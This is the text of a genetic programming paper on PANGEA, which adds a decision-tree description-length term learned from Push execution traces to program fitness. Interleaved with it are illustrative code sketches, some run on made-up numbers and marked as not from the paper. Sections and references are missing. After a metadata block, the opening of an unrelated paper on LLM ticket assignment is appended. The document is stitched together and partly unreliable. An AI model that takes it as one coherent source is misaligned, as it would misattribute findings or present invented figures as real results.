Since these partial results have ultimately been calculated from input data that came with the task and using an instruction set that also belongs to task formulation, they can represent useful pieces of knowledge of potential value in assembling a complete solution. In particular, the outcomes calculated for multiple inputs (fitness cases) can form some patterns that can be exploited to solve the task. A skilled human programmer or mathematician is capable of discovering such patterns and exploiting them to reach the goal, i.e. to design an algorithm that meets a prescribed specification. Moreover, humans are capable of defining what patterns are desired as an intermediate result. Consider designing an algorithm that calculates the median of a vector of numbers. A reasonable first stage of solving this task is sorting the elements of the input vector. an intermediate memory state (pattern) containing sorted elements of the input vector is desired for this task (and anticipated by a human programmer). Given that the distribution of problems considered in practice (including the problems approached with GP) is highly nonuniform, one might anticipate that some such patterns occur more frequently than others. In theory, it should be then possible to build an algorithm (system) which mimics the human programmer in that respect, i.e. in being capable of detecting the potentially useful patterns and rewarding the programs that produce them at intermediate execution stages. Hereafter, we use the term PANGEA (PAtterN Guided Evolutionary Algorithms) to describe this conceptual framework (as will be seen, there are no specific requirements that this approach be restricted to GP). The specific approach proposed in this paper belongs to this framework and is based on the observation that, as a matter of fact, computational intelligence already provides automated pattern discovery tools that can capture the regularities in data. What we mean by this are the various machine learning and knowledge discovery algorithms. Thus, the key idea of the approach is to use a machine learning algorithm to search for such patterns by training it on the partial outcomes of program execution. Information on the resulting trained classifier (in particular its complexity and accuracy) is then used to augment the fitness function. If this approach is able to reveal meaningful dependencies between partial outcomes and the desired output, we may hope to thereby promote programs with the potential to produce good results in future, even if at the moment of evaluation the output they produce is incorrect. 2. THE BACKGROUND We define a GP task as a set of \( n \) fitness cases (tests). A test is a pair \((x_i, y_i)\), \( i = 1, \ldots, n \), where \( x_i \) is the input to be fed into program, and \( y_i \) is the desired output. In general, \( x, y \) can be arbitrary objects. Evaluation of an individual-program \( p \) assesses the quality of its mapping from inputs to desired outputs by applying it to all tests in turn. For each test, \( p \) is provided with input \( x_i \) and executed, returning output which we denote as \( p(x_i) \). We say that \( p \) solves test \((x_i, y_i)\) if it terminates and \( p(x_i) = y_i \). The fitness of a program is simply the fraction of tests it does not solve, i.e. \[ f(p) = \frac{1}{n} \left[ n - |\{(x_i, y_i) : p(x_i) = y_i\}| \right]. 
\] Note that for the sake of simplicity, in this study we assume that only perfect matches between the desired output and the actual output are of interest. Therefore, only the equality relation in the space of program outputs needs to be defined (rather than more sophisticated relations like similarity). The fitness defined in this way is obviously minimized fitness, and a program \( p \) solves a task if \( f(p) = 0 \). 3. THE METHOD The method proposed in this paper differs from standard GP only in the manner in which fitness is assigned to individuals. Therefore, given the formalization of the conventional fitness assessment in the previous section, we show here how we diverge from it. This process, illustrated in Fig. 1 can be split into four stages detailed in the following subsections. 3.1 Program trace acquisition Our method works by gathering and exploiting information resulting from the intermediate stages of program execution. For this to be possible, we have to assume that (i) program execution is a stepwise process that can be paused, and that (ii) at such pauses, some information can be obtained from the execution environment. In virtually all genres of GP, these requirements are met by default. Concerning for instance the former, program is a discrete structure composed of symbols interpreted in certain order. These assumptions allow us to formalize certain notions, which we do below, abstracting from any specific form of GP. Formally, let \( s_j(p, x_i) \) denote the state of the execution environment when applying program \( p \) to test \( x_i \) after \( j \) steps have been executed. In side-effect free programming, relatively typical of tree-based GP, this would embrace a partial program (a subtree) and its outcome (the value returned by this subtree). For stateful execution environments, typical of programming languages with side-effects, this would be the state of the interpreter (its memory, instruction pointer, etc.). In other words, state is a 'snapshot' of the concrete process of program execution (i.e. pertaining to specific \( x_i \)). The sequence of states \( (s_j(p, x_i) : j = 1, \ldots, l) \) resulting from entire program run forms its trace, where \( l \) is the number of steps, e.g., the number of instructions executed by a program, whether it terminated on its own or was forced to do so. The last state in a trace is the state of execution environment after program completion. We used a similar definition in our previous work on semantic analysis of program behavior [2]. In the proposed approach, the fitness assessment presented in Section 2 is accompanied by trace registration. As a re- sult, we obtain a list of traces \( (s_j(p,x_i) : j = 1, \ldots, l_i) \) for our \( n \) fitness cases \((x_i, y_i)\). Let us note that, because in general program termination depends on its input, traces can vary in length, hence the index \( i \) in \( l_i \). ### 3.2 Extracting trace features The trace can be considered as a way of capturing program behavior. The key idea of PANGEA consists in analyzing the traces in search for patterns/regularities that reveal hidden qualities in the program and its partial outcomes. Various tools can be potentially used for this purpose, which we elaborate on in Section 7. In this paper, for the sake of simplicity, we aim at employing conventional machine learning algorithms that implement the paradigm of learning from examples and attribute-value representation [8]. 
To match the requirements of conventional machine learning algorithms with respect to input data, we transform the list of traces into a conventional machine learning dataset, where each row (example) corresponds to GP test, and every column is a feature derived in certain way from the traces. Each feature reflects certain syntactic or semantic information of all program traces at certain stage of program execution. Because the way the features are calculated from the states depends on state internals, this (and only this) stage of our approach varies depending on GP genre. In the subsequent section and experimental part, we detail it for Push [12], but in our pursuit of generality, we abstract from this technical detail in this section. Crucially, we make this dataset define a supervised learning task. To this aim, we equip it with an extra column that defines a decision attribute. The value of this attribute is based on the desired output \( y_i \) of the corresponding test \((x_i, y_i)\). In this paper we focus on GP tasks in which \( y_i \) is a single discrete value, in which case the decision attribute simply is \( y_i \). This attribute will allow us to detect and capture patterns that are relevant for solving the task at hand. ### 3.3 Capturing patterns in features The outcome of the above stage is a dataset of \( n \) examples, each described by the same number of features and labeled with a decision attribute that identifies the desired output. The purpose of the next step is to assess how useful these features are in predicting the desired output of the program. We achieve this by training a standard machine learning classifier, using the entire dataset as the training set. Specifically, we employ C4.5, a popular decision tree induction algorithm [3]. We anticipate that this choice is not critical; any inductive learning method could be applied here, as long as its outcomes can be analyzed with respect to the properties required in the next step. We are interested in two characteristics of the induced classifier. Firstly, it has certain inherent complexity, which in the case of decision trees can be conveniently expressed as the number of tree nodes. Secondly, it commits a certain classification error on the training set, i.e. it erroneously classifies some of the examples. According to the Minimum Description Length principle (MDL [10]), the complexity of the mapping from the space of features onto the decision attribute may be expressed by summing the encoding length of the classifier (the ‘rule’) and the number of erroneously classified examples (the exceptions from the rule). In our context, this quantity tells us how easy it is to come up with the correct output of the program given the partial results gathered from its traces. This is the core element of the approach we propose here. From another perspective, the role of the classifier is to complement the program’s capability of solving the problem (i.e. producing the desired output value). If the features collected from the program trace form meaningful patterns, i.e. capture regularities in input data that are relevant to program output (decision class), then the induction algorithm should be able to build a compact tree that commits few classification errors (and thus has short description length). To illustrate this, let us consider an extreme case of an ideal program \( p \) that solves the task, i.e. produces the desired output \( y_i \) for all tests \((y_i \equiv p(x_i))\). 
Since the final (post-execution) state is the last element of each trace, and the features are collected from trace elements, one or more of the features in the training set will be highly correlated with the decision attribute. Assume for simplicity that the feature is perfectly correlated with \( y_i \). In such a case, the induction algorithm will produce a decision tree composed of a single decision node (using that particular feature), and \( d \) leaves that correspond to the \( d \) decision classes. This is the smallest decision tree that can be built for such a problem. This tree commits no classification errors, so the total length of the classifier encoding and the 'exceptions' will be minimal. In this scenario, the classifier does not augment the capabilities of the program.

If the program does not produce the desired output, the tree induction algorithm will be forced to make use of other features collected from the traces. The resulting tree will usually be larger than the minimal tree and/or commit some classification errors. In general, the less useful the features collected from the trace, the longer will be the total description length of the mapping. This shows that the total length of encoding expresses the usefulness of the intermediate results produced by the program (not only explicit results, reflecting, e.g., memory states, but also side-effects such as the total number of execution steps). Most importantly, this length provides a meaningful way of assessing a program's 'prospective' capabilities, even if the actual output of the program is completely useless from the point of view of the task being solved (i.e. has nothing in common with the desired output).

### 3.4 Fitness calculation

Based on the above rationale, we define program fitness as follows. Let \( l(p) \) denote the total number of tree nodes, and \( c(p) \) the number of examples that are erroneously classified by the tree induced from the traces of individual-program \( p \), \( c(p) \in [0, n] \). In PANGEA, the fitness of \( p \) is the product of the standard fitness \( f(p) \) (\( 0 \leq f(p) \leq 1 \), Formula 1) and two terms that penalize the individual for, respectively, the complexity of the mapping implemented by the induced classifier, and for the number of classification errors (exceptions from that mapping):

\[ f_p(p) = f(p) \times \log_2(l(p) + 1) \times \frac{c(p) + 1}{n + 1} \] (2)

The particular form of this equation results from preliminary experiments. The logarithm of the tree size is used so that model complexity is proportional to tree depth rather than to tree size. The +1 term in the second component (responsible for model complexity) prevents it from sinking to zero (the tree always has at least one node). The +1 term in the numerator of the third component (encoding length of exceptions) plays an analogous role. Therefore, the MDL-related components of fitness have an impact on a program's fitness, but will never render it perfect. That can be achieved only by bringing the actual error committed by \( p \) on the tests, i.e., \( f(p) \), to zero. Thus, a solution is optimal in PANGEA if and only if it is optimal w.r.t. the standard fitness definition (Formula 1).

4. RELATED WORK

There are numerous occasions in which the MDL principle has been used in GP. In most such cases, it has played a similar role to other machine learning techniques, i.e. as a means of controlling the trade-off between model complexity (sometimes referred to as \textit{parsimony} in an ML context) and accuracy.
In this spirit, Iba \textit{et al.} used it to prevent bloat in GP by designing an MDL-based fitness function that took into account the error committed by an individual as well as the size of the program. A few later studies followed this research direction (see, e.g. [14]). By focusing mostly on the effects of program execution (the partial outcomes reflected in trace features) rather than on syntax, PANGEA can be seen as following the recent trend of semantic GP, initiated in [7]. Interestingly, it also resembles evolutionary synthesis of features for machine learning and pattern/image analysis tasks [6]. However, here the ML part serves only as a scaffolding for evolution: it is supposed to provide ‘gradient’ for evolution when the sole program output is not able to do so. The classifier is not the part of a solution. 5. IMPLEMENTING PANGEA WITH PUSH In this section we explain how the process of feature extraction can be implemented for the programming language Push \[12\], which is also used in the experimental part of this paper. However, this choice is rather incidental, since program traces and their features can be easily acquired for other programming environments common in GP. 5.1 The fundamentals of Push Push is a stack-based language, and its interpreter is equipped with a stack that holds the program to be executed, and a separate stack for each data type. For simplicity, we assume here that computation takes place in the Boolean and integer domains only, so only these three stacks (called EXEC, BOOLEAN and INTEGER in the following) will be of interest to us. Push programs are lists of instructions that can be nested. To run a program, it is pushed onto the EXEC stack. Instructions are then popped from this stack and executed in turn. Every Push instruction manipulates one or more stacks. For instance, \texttt{integer.=} instruction pops two elements from the integer stack and pushes the result of their comparison atop the boolean stack. An instruction has no effect if the stack is too shallow. For details on this and other features of this programming framework, see [12]. When matching the notation introduced in Section 2 against Push, a task is a list of tests \((x_i, y_i)\), where \(x_i\) determines the state of the execution environment (the stacks) before program execution, and \(y_i\) determines the analogous desired state after program completion. For inputs, ‘determines’ means in practice placing the elements of \(x_i\) onto the stacks of appropriate types. For outputs, \(y_i\), usually a scalar value, specifies the desired value on the top of the stack of appropriate type. For simplicity, we consider here only tasks with desired outputs \(y_i\) specified as scalars (atoms) of either integer or boolean type (depending on task type). We also assume that \(x_i\) is an arbitrary-length vector of integers that determines the initial state the INTEGER stack, and the output is the contents it leaves on the top the stack (INTEGER or BOOLEAN, depending on the type of desired output) after completion. We assume that a test has not been solved if the output stack is empty. By way of example consider the task of verifying whether the input is a list of integers sorted ascendingly. In such task, each \(x_i\) would be a list of integers that would be placed on the INTEGER stack prior to program execution, while each \(y_i\) would be a Boolean value to be expected on the BOOLEAN stack. 
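To make the stack discipline concrete, the following C sketch (purely illustrative; it is not taken from the Push interpreter, and the data layout is an assumption) mimics the behavior described above for `integer.=`: pop two elements from the INTEGER stack, push the comparison result onto the BOOLEAN stack, and do nothing if the stack is too shallow.

```c
#include <stdbool.h>
#include <stdio.h>

/* A toy model of two Push stacks, just to illustrate integer.= */
typedef struct { int  data[64]; int top; } IntStack;
typedef struct { bool data[64]; int top; } BoolStack;

/* integer.= : pop two integers, push whether they are equal.
 * Like a real Push instruction, it has no effect if the stack is too shallow. */
void integer_eq(IntStack *ints, BoolStack *bools) {
    if (ints->top < 2) return;                 /* not enough operands: no effect */
    int a = ints->data[--ints->top];
    int b = ints->data[--ints->top];
    bools->data[bools->top++] = (a == b);
}

int main(void) {
    IntStack  ints  = { {7, 7}, 2 };           /* INTEGER stack holds 7 7 */
    BoolStack bools = { {false}, 0 };

    integer_eq(&ints, &bools);
    printf("%s\n", bools.data[0] ? "true" : "false");   /* prints true */
    return 0;
}
```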
5.2 Trace acquisition and feature extraction in Push

For Push, we implement the trace acquisition and feature extraction process introduced in general in Sections 3.2 and 3.1 as follows. We track program execution by pausing it after each instruction and storing the state of the interpreter. We do so until the program terminates or reaches a prescribed maximum number of steps. A state comprises all stacks that are relevant for the tasks considered in this paper, i.e., BOOLEAN, INTEGER, and EXEC. The list of states collected in this way for a specific test \((x_i, y_i)\) forms the trace. Let us reiterate that, depending on the input \(x_i\), the number of executed instructions may vary, and hence so may the length of the resulting trace (see Fig. 1).

After tracing the execution of the program on all \(n\) tests, we build a machine learning dataset by extracting features from selected elements of the history of program execution gathered in the traces. Each trace gives rise to one example in the set. Starting from the last state of the trace, we iterate backwards over the \(k\) last states, and from each of these states \(s_j\) we extract the following features:

- The sizes of all three stacks under consideration.
- The top elements of these stacks (if a stack is empty, we assume default values: zero for the INTEGER stack, and a special value \texttt{Null} for the BOOLEAN and EXEC stacks).

In this process, we maintain the types of data: the integer-valued components of the interpreter state (the sizes of all stacks and the top element of the INTEGER stack) translate into ordinal features, and the remaining components (the top elements of the BOOLEAN and EXEC stacks) give rise to nominal (categorical) features.

Let us illustrate this process with a simple example, in which we focus exclusively on the INTEGER stack (feature extraction for the other stacks proceeds analogously). Assume we have three fitness cases and \(k = 2\). A program was applied to these cases, and the top elements of the INTEGER stack in the corresponding traces were as follows:

- For test #1: 1 2 3 4
- For test #2: 5 6 7
- For test #3: 8 9

The lengths of the traces range from four to two, which tells us that the program terminated after executing a different number of instructions for each fitness case. This is quite common for Push programs and may result from, e.g., the presence of loops. Because \( k = 2 \), two features (apart from the features reflecting the sizes of stacks) will be extracted from these traces: \( a_1 = [3, 7, 0] \) and \( a_2 = [4, 0, 0] \), where the zeroes are the default values.

In general, three stacks (each giving rise to two features: the top element and the size) and two methods of feature building total \( 12k \) features for a horizon of length \( k \). This set is supplemented with another feature: the number of execution steps \( t_i \) carried out by the interpreter for the \( i \)th test. Thus, the complete dataset forms a table of \( n \) rows (examples) and \( 12k + 1 \) columns (features), \( 8k \) of which are ordinal and \( 4k+1 \) nominal. Finally, we provide each example with a class label, which is simply the desired output, i.e., \( y_i \). Therefore, the number of distinct output values in the set of fitness cases is also the number of decision classes in the extracted dataset. The dataset constructed in this way forms the result of the feature extraction process, and is subject to the further processing presented in Sections 5.3 and 5.4.
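The following Python sketch (ours, not from the paper) reproduces the feature extraction of the worked example above for the ‘top of the INTEGER stack’ component; the alignment rule, in which traces shorter than the horizon contribute the default value, is our reading of the example, and it indeed yields \( a_1 = [3, 7, 0] \) and \( a_2 = [4, 0, 0] \).

```python
def extract_top_features(traces, k, default=0):
    """Extract the k last 'top of INTEGER stack' features for every trace.

    Positions are aligned on absolute execution steps; a trace that is
    too short to reach a given step contributes the default value.
    """
    horizon_end = max(len(t) for t in traces)   # last step of the longest trace
    features = []
    for step in range(horizon_end - k, horizon_end):
        features.append([t[step] if 0 <= step < len(t) else default
                         for t in traces])
    return features

traces = [[1, 2, 3, 4],   # test #1
          [5, 6, 7],      # test #2
          [8, 9]]         # test #3
a1, a2 = extract_top_features(traces, k=2)
print(a1, a2)             # [3, 7, 0] [4, 0, 0]
```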
6. EXPERIMENT

The main objective of the experiment is to determine whether pattern-based evaluation of individuals can be beneficial for evolutionary search. To this end, we compare the PANGEA approach to the control method of standard PushGP. More specifically, we compare GP runs under the two fitness definitions given by Formula 1 and Formula 2.

In all the test problems we consider, listed in Table 1, the input data is a tuple of one or more elements placed on the INTEGER stack prior to program execution, and the desired output is a scalar value. In most problems (AEQ, CNF, ISO, MAJ), the task is to verify certain properties of the input (the output type is Boolean). Two problems (COZ, MAX) are of a more arithmetic nature (the output type is integer). The choice of this particular suite of tasks is deliberate: all of them can be expressed naturally in the integer and Boolean domains handled by our Push configuration.

The tool we use for capturing patterns in traces is the C4.5 decision tree inducer, and the only difference between the standard setup (STD) and the proposed approach (PANGEA) is the manner in which individuals are evaluated. Fitness is minimized in both cases: in STD it is Formula 1, and in PANGEA it is calculated according to Formula 2. PANGEA gathers features from the last three states of the interpreter (\(k = 3\)). In terms of success ratio, the only problems on which PANGEA does not outperform STD are AEQ3 and AEQ4, which apparently can be solved with ease by either of the compared methods; PANGEA outperforms STD on the remaining problems.

### 6.2 The role of fitness components

The interplay of the components of the fitness function defined by Formula (2) can be expected to be very complex, so it is worth investigating the extent to which they all contribute to the performance of PANGEA. In other words: could it be that PANGEA fares better only because the MDL-related components introduce pseudo-random noise into the evaluation criterion and so help the evolution to escape stagnation? To verify this, we ran a series of experiments with fitness based on Formula (2), but devoid of single components:

- PANGEA-E: Formula (2) devoid of the program error (first) component,
- PANGEA-M: Formula (2) devoid of the model length (second) component,
- PANGEA-X: Formula (2) devoid of the classification error (third) component.

The performance of these methods is shown in the lower part of Table 3. As it turns out, all three components of Formula (2) are vital. Removal of any of them typically results in a lower success ratio than that of PANGEA. The only exceptions are AEQ3 and AEQ4, which apparently can be solved with near certainty even with such ‘crippled’ fitness functions. This result shows that for the fitness assessment scheme followed by PANGEA, it is important to take into account not only the complexity of the model (tree), but also the classification errors it commits.

To provide an overall perspective on these results, in the last column of Table 3 we report the average rank of each of the five setups. PANGEA clearly ranks as best. We validate the statistical significance of the ranks using the Friedman test (sketched below), the outcome of which is positive ($p \approx 0.0005$), i.e. at least one of the setups has a success ratio significantly different from the others. Shaffer’s post-hoc analysis procedure allows us to determine that PANGEA is significantly better ($p < 0.05$) than STD and PANGEA-M.
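For reference, the rank computation and the Friedman test can be reproduced with SciPy as sketched below (our example with made-up success ratios, not the values from Table 3; Shaffer's post-hoc procedure is not in SciPy and would require a dedicated package).

```python
import numpy as np
from scipy.stats import friedmanchisquare, rankdata

# Rows: benchmark problems; columns: setups
# (STD, PANGEA, PANGEA-E, PANGEA-M, PANGEA-X). Made-up success ratios.
success = np.array([
    [0.10, 0.55, 0.30, 0.20, 0.35],
    [0.95, 1.00, 0.98, 0.97, 0.99],
    [0.20, 0.60, 0.40, 0.25, 0.45],
    [0.05, 0.50, 0.30, 0.15, 0.30],
    [0.30, 0.70, 0.50, 0.35, 0.55],
])

# Average rank of each setup across problems (rank 1 = highest success ratio).
ranks = np.array([rankdata(-row) for row in success]).mean(axis=0)
print("average ranks:", ranks)

# Friedman test: does at least one setup rank significantly differently?
stat, p = friedmanchisquare(*success.T)
print(f"Friedman chi2 = {stat:.3f}, p = {p:.4f}")
```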
### 6.3 Dynamics of the search process

To illustrate the working principle of PANGEA, in this section we briefly analyze an exemplary evolutionary run for the MAJ3 problem. That particular run lasted 20 generations, by which point an ideal solution had been found.

The chart in Fig. 2 summarizes the dynamics of that search process by plotting the important parameters of the best-of-generation individuals. For each such individual $p$, we show in parallel the essential components of the PANGEA fitness (Formula 2): the overall fitness $f_P(p)$; the actual error $f(p)$ committed by the program on the fitness cases (the standard fitness, Formula 1); the size $l(p)$ (the number of nodes) of the associated decision tree induced from trace features; and the classification error $c(p)$ committed by the tree. Because of their different magnitudes, the former two are plotted against the left-hand ordinate axis, and the latter two against the right-hand ordinate axis.

In the first five generations of the run, evolution does not seem to make progress, and all the parameters of the best-of-generation solutions remain unchanged. In this period, the decision trees comprise only three nodes and commit 8.4 classification errors (in general, the classification error of C4.5 is defined on a continuous scale), i.e., roughly eight of the 12 fitness cases that constitute the MAJ3 task get misclassified. Let us emphasize that the constancy of these parameters may be purely incidental, i.e. it does not imply that the trees corresponding to these five best-of-generation individuals use the same features. The very small tree size, in connection with the relatively large number of classification errors, suggests that the traces are scant in useful features, and that decision trees that accurately and succinctly map them onto the desired output cannot be built.

In generation 6, evolution manages to make progress and the best-of-generation overall fitness $f_P(p)$ substantially improves. The reason for this is, however, not a better match between the program output and the desired output; just the opposite, $f(p)$ actually deteriorates. The cause of the fitness improvement lies elsewhere: what actually happened is that the classification error committed by the tree, $c(p)$, dropped from 8.4 to 3.5, while the size of the tree, $l(p)$, increased from 3 to 5. Apparently, at some stage of execution of the best-of-generation program, a new pattern emerged in its traces (new w.r.t. the best programs from previous generations). That feature (one or more) allowed building a more accurate decision tree that has only two more nodes. As a result, the product of the two MDL-related terms in Formula 2 decreased and brought down the overall fitness $f_P(p)$, despite the actual deterioration of the final output produced by the program as measured by the standard fitness $f(p)$ (Formula 1).

In the subsequent 7th generation, the induction algorithm manages to build an even smaller tree, bringing its size back to three nodes while maintaining the same classification error $c(p) = 3.5$. This results in a further improvement of the overall fitness, even though $f(p)$ remains unchanged.

Generation 8 is the first time the program trace allows building a perfect decision tree ($c(p) = 0$). This is also the generation in which the mismatch between the program’s output and the desired output ($f(p)$) is maximal in this run. This, however, does not prevent this program from outperforming the best individual of the previous generation in terms of the overall fitness $f_P(p)$. The tree found in generation 8 is large: it comprises 21 nodes. Nevertheless, the very next generation sees a large decrease of this value: the tree has five nodes again, and classifies all examples perfectly.
With minor fluctuations, this state is maintained in the remaining part of the run, while the evolution clearly works on the output of the program, gradually bringing $f(p)$ to zero.

This illustration confirms our rationale behind PANGEA’s design, expressed in Section 3.3: the MDL-related components in the fitness definition protect the individuals that discover meaningful patterns in the task and display those patterns in their behavior (written down in program traces). Without this mechanism, an individual like the one that became best-of-generation in generation 6 would most likely get lost in the selection process, as its error $f(p)$ is noticeably worse than the error of the best individual from the previous generation.

PANGEA enables even more insightful analysis, which we are forced to omit in this short contribution. For instance, it would be fascinating to see which features led to the major transitions observable in runs like the one above, and also the code that generated them. Such investigations could help us, for instance, to determine whether, in the example above, evolution, after discovering the meaningful patterns around generations 5 to 8, kept the initial parts of programs roughly unchanged (to preserve the patterns) while working mostly on the final instructions (responsible for producing the final program output).

7. DISCUSSION

Our approach relies on a three-stage process: the recognition of patterns, the explicit description of such patterns in ‘working memory’, and the exploitation of these patterns to guide the search process. In the approach described here, the patterns are written down as decision trees, which in turn augment the fitness function. Of course, such classifiers might be incapable of capturing the specific form of patterns that are relevant for solving a particular task.

We have adopted the intentionally evocative term ‘pattern’, rather than ‘feature’, in order to emphasize the potential for algorithmic sophistication and nontrivial computational effort in detecting and exploiting any aspects of the search process. We might therefore hope to mine for such patterns in the problem description, the genotype-to-phenotype mapping, the solution-state trajectory, the algorithm-state trajectory, or the operator-sequence trajectory. It is clearly possible to combine these modalities, e.g. as in the current article, which works with the combined trajectories of algorithm state, solution state and operator sequence. We give here some possible ‘use cases’ for pattern detection that illustrate the potential for future work within this abstract framework:

1. One of the well-known properties of GP is that it is a ‘model-agnostic’ approach: assuming that we apply the function set \(\{+, -, \times, /, \exp, \log, \sin, \cos, \tan\}\) to a function that is actually linear, we expect the transcendental non-terminals to be dropped and the resulting best program to be a linear expression. However, the detection of linearity is merely implicit in GP; this activity is not explicitly directed by any features of the problem. GP may find out at some point of evolution that using a linear model is profitable, but does not ‘sanction, mandate or suggest’ it. The detection of linear relationships between features is of course a relatively trivial computational task (a minimal check is sketched below), but the ability to explicitly recognize such patterns and inject the corresponding (sub)programs into the population can be viewed as a special case of a more general recognition-exploitation strategy [13].
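As an illustration of how computationally cheap such a linearity check can be, the sketch below (our example, not part of PANGEA itself) fits a least-squares linear model to samples of the target function and flags the task as linear when the residual is negligible.

```python
import numpy as np

def looks_linear(X, y, tol=1e-8):
    """Check whether y is (numerically) a linear function of the columns of X."""
    A = np.hstack([X, np.ones((X.shape[0], 1))])   # add an intercept column
    w, *_ = np.linalg.lstsq(A, y, rcond=None)      # least-squares fit y ~ A w
    residual = np.linalg.norm(A @ w - y)
    return residual < tol, w

rng = np.random.default_rng(0)
X = rng.uniform(-1.0, 1.0, size=(50, 2))
y = 3.0 * X[:, 0] - 2.0 * X[:, 1] + 1.0            # a secretly linear target
is_linear, w = looks_linear(X, y)
print(is_linear, np.round(w, 6))                   # True [ 3. -2.  1.]
```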
2. Consider a training set \( T \) of samples of a function \( f(x, y) \) in which \( f(x, y) = f(y, x) \) for every pair \( (x, y) \) occurring in \( T \). Even in the absence of prior domain knowledge, a human presented with sufficient samples from the raw training data for this task would in all probability notice that the function is symmetric. Algorithms for the online induction of symmetries in the context of search and optimization are given in [11]. Such symmetry is of course a very specific case of (what is provisionally conjectured to be) an invariant of the function. Presented with such a regression task, a ‘pattern-sensitive’ human being would likely proceed to synthesize a function that respects this invariant. A partial synthesis might of course break the invariant, but this activity is subject to the implicit understanding that ultimately restoring it is imperative. There are a number of ways in which one might attempt to incorporate the invariant into the subsequent search process, perhaps the most obvious of which is to add it as a soft constraint to the heuristic function.

8. CONCLUSIONS

PANGEA imposes a gradient on the fitness function of a metaheuristic (in this case, genetic programming) via a metric (minimum description length) obtained from patterns detected in the trajectory of program execution (the trace). The success of this method was demonstrated on a range of integer- and Boolean-valued problems. The method is conceptually straightforward and applicable to virtually any genre of GP. The computational overhead it imposes in comparison to conventional fitness assessment is reasonable, because trace acquisition is done on the fly during program execution (which has to be carried out in regular GP as well). The only substantial additional cost results from training the classifier; however, simple symbolic classifiers like C4.5 learn quickly.

It is increasingly being acknowledged that EC approaches are not a “one size fits all” solution. In particular, it is now understood that the initially popularized crossover and mutation operators do not enjoy the universality that was once ascribed to them. There is therefore, in general, a requirement in current EC practice for human ingenuity in the design and application of domain-specific operators, penalty functions, etc. This work is an initial attempt to circumvent this requirement via the exploitation of regularity. In this case, regularity was determined by a statistical machine learning approach, i.e. the induction of a decision tree. In future work, we seek to extend both the pattern detection methodology and the means by which it influences the subsequent search process.

Acknowledgments

K. Krawiec acknowledges financial support from grant no. 91507. J. Swan acknowledges support from grant EP/J017515/1.

9. REFERENCES
{"Source-Url": "http://www.cs.put.poznan.pl/kkrawiec/wiki/uploads/Research/2013GECCOPangea.pdf", "len_cl100k_base": 7913, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 28534, "total-output-tokens": 9172, "length": "2e12", "weborganizer": {"__label__adult": 0.0004570484161376953, "__label__art_design": 0.0003840923309326172, "__label__crime_law": 0.0004935264587402344, "__label__education_jobs": 0.0008778572082519531, "__label__entertainment": 9.78708267211914e-05, "__label__fashion_beauty": 0.00021755695343017575, "__label__finance_business": 0.0002639293670654297, "__label__food_dining": 0.0004398822784423828, "__label__games": 0.0007791519165039062, "__label__hardware": 0.0012798309326171875, "__label__health": 0.0008373260498046875, "__label__history": 0.0003812313079833984, "__label__home_hobbies": 0.0001742839813232422, "__label__industrial": 0.0007271766662597656, "__label__literature": 0.0004394054412841797, "__label__politics": 0.0004105567932128906, "__label__religion": 0.0007319450378417969, "__label__science_tech": 0.09637451171875, "__label__social_life": 0.0001246929168701172, "__label__software": 0.00658416748046875, "__label__software_dev": 0.88623046875, "__label__sports_fitness": 0.0005125999450683594, "__label__transportation": 0.0009250640869140624, "__label__travel": 0.00023651123046875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40106, 0.03637]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40106, 0.39461]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40106, 0.91634]], "google_gemma-3-12b-it_contains_pii": [[0, 4419, false], [4419, 9646, null], [9646, 16729, null], [16729, 23093, null], [23093, 25626, null], [25626, 27783, null], [27783, 33914, null], [33914, 40106, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4419, true], [4419, 9646, null], [9646, 16729, null], [16729, 23093, null], [23093, 25626, null], [25626, 27783, null], [27783, 33914, null], [33914, 40106, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40106, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40106, null]], "pdf_page_numbers": [[0, 4419, 1], [4419, 9646, 2], [9646, 16729, 3], [16729, 23093, 4], [23093, 25626, 5], [25626, 27783, 6], [27783, 33914, 7], [33914, 40106, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40106, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
50d2bcce15006ca1898140ac728cf8682cb05d08
LLM-based Approaches for Automatic Ticket Assignment: A Real-world Italian Application

Nicola Arici\textsuperscript{1,2,*}, Luca Putelli\textsuperscript{1}, Alfonso E. Gerevini\textsuperscript{1}, Luca Sigalini\textsuperscript{2} and Ivan Serina\textsuperscript{1}

\textsuperscript{1}Department of Information Engineering, University of Brescia, Via Branze 38, Brescia, Italy
\textsuperscript{2}Mega Italia Media, Via Roncadelle 70A, Castel Mella, Italy

Abstract

IT service providers need to take care of errors, malfunctions, customizations and other issues every day. This is usually done through tickets: brief reports that describe a technical issue or a specific request sent by the users of the service. Tickets are often read by one or more human employees and then assigned to technicians or programmers in order to solve the raised issue. However, the increasing volume of such requests is leading the way to the automation of this task. Since these tickets are written in natural language, in this paper we exploit the powerful pre-trained Large Language Model (LLM) GPT-4 and its knowledge in order to understand the problem described in the tickets and to assign them to the right employee. In particular, we focus our work on how to formulate the request to the LLM, which information is needed, and the performance of different zero-shot learning, few-shot learning and ensemble learning approaches. Our study is based on a real-world ticket dataset provided by an Italian company which supplies IT solutions for creating and managing online courses.

Keywords: Automatic Ticket Assignment, Large Language Models, Prompt Engineering, Text Classification

1. Introduction

